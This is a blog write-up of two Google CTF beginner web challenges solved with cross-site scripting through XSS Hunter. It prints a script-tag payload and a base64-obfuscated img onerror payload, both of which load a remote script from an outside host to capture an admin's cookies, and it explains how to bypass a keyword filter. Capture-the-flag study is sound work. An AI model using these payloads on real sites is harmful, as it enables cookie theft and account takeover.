Home Writeups Contact

Using XSS Hunter to solve Google CTF Quals Beginners Quest Challenges: [Government Agricultural Network, Cookie World Order]

In these writeups, I'm going to try to demonstrate using XSShunter to solve challenges

Government Agricultural Network - Web

chal 1 desc

Description wasn't super helpful for me, so first step is to visit the website.

The site has a text input box, where you can submit a post for administrator review.

post gif

There is also a page called "/admin", however this just redirects you back to the main page.

Because the site tells us that an administrator will review the post, this is a good hint that we are going to want to try XSS.

Since we're not able to see the result of our posts, this is also blind XSS, when I run into blind XSS I like to use XSS hunter, which provides a screenshot, user agent, cookies, and emails the result directly to you.

So, if we make a post with

"><script src=https://atckr.xss.ht></script>

as our payload, and then go to the XSShunter panel, we can see a full report with all the required info, including the flag!

full report with flag

Flag: CTF{8aaa2f34b392b415601804c2f5f0f24e}



Cookie World Order - Web

chal desc 2

Another XSS challenge, however this is not blind, and there is a filter.

Upon going to the website, you see a panel where you can send a message to an admin, and a little video of a garden.

chal 2 site

First off, let's try the same thing from the previous challenge.

xss detected

Oh no! We've been detected!

So, this is clearly a filter, but to understand how to bypass it we need to know exactly what it's filtering.

To do this I removed elements one by one, until I got to the point where I could still send the message

After trying this, I realized that it was just filtering "script" from that message, meaning we can still use things like angle brackets.

xss filter

If this was a longer challenge, I would have created a more complete list of filtered items, however after trying a couple more the only other ones I found were "onload" and "alert".

A handy function of XSShunter is that it also provides some payloads that you can try. Because of the incomplete nature of the filter, there are many many ways you can bypass it, but since I'm trying to focus on XSShunter here, I'm going to explain one of the payloads they provide.

In the payloads tab, you'll see one that looks like this:

"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYXRja3IueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61; onerror=eval(atob(this.id))>

Now, I'll break it down piece by piece.

"> breaks the previous tag

<img src=x set image source to something invalid to cause an error

id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYXRja3IueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== sets id to the base64 encoded equivalent of

var a=document.createElement("script"); // Create script element
a.src="https://atckr.xss.ht"; // Define the script source (xsshunter's script)
document.body.appendChild(a); // Append "a" (the script) to the body of the current document

onerror=eval(atob([this.id](http://this.id/)))> when <img src=x results in an error, use atob() to base64 decode it, then evaluate it with eval()

All together, and posted in the message panel results in:

xss success

Looking back at XSShunter, we can see the report

report 2

Flag: CTF{3mbr4c3_the_c00k1e_w0r1d_ord3r}